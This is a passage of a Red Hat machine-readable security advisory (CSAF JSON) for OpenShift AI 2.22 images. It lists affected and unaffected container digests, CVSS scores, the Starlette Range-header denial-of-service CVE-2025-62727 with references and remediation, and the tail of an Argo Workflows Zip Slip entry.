"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/argoproj/argo-workflows: Argo Workflows Zip Slip"
},
{
"cve": "CVE-2025-62727",
"cwe": {
"id": "CWE-407",
"name": "Inefficient Algorithmic Complexity"
},
"discovery_date": "2025-10-28T21:01:03.833849+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2406929"
}
],
"notes": [
{
"category": "description",
"text": "Starlette is a lightweight ASGI framework/toolkit. Starting in version 0.39.0 and prior to version 0.49.1 , an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette\u0027s FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial\u2011of\u2011service for endpoints serving files (e.g., StaticFiles or any use of FileResponse). This vulnerability is fixed in 0.49.1.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "starlette: Starlette DoS via Range header merging",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-62727"
},
{
"category": "external",
"summary": "RHBZ#2406929",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2406929"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-62727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62727"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-62727",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62727"
},
{
"category": "external",
"summary": "https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5",
"url": "https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5"
},
{
"category": "external",
"summary": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8",
"url": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8"
}
],
"release_date": "2025-10-28T20:14:53.655000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
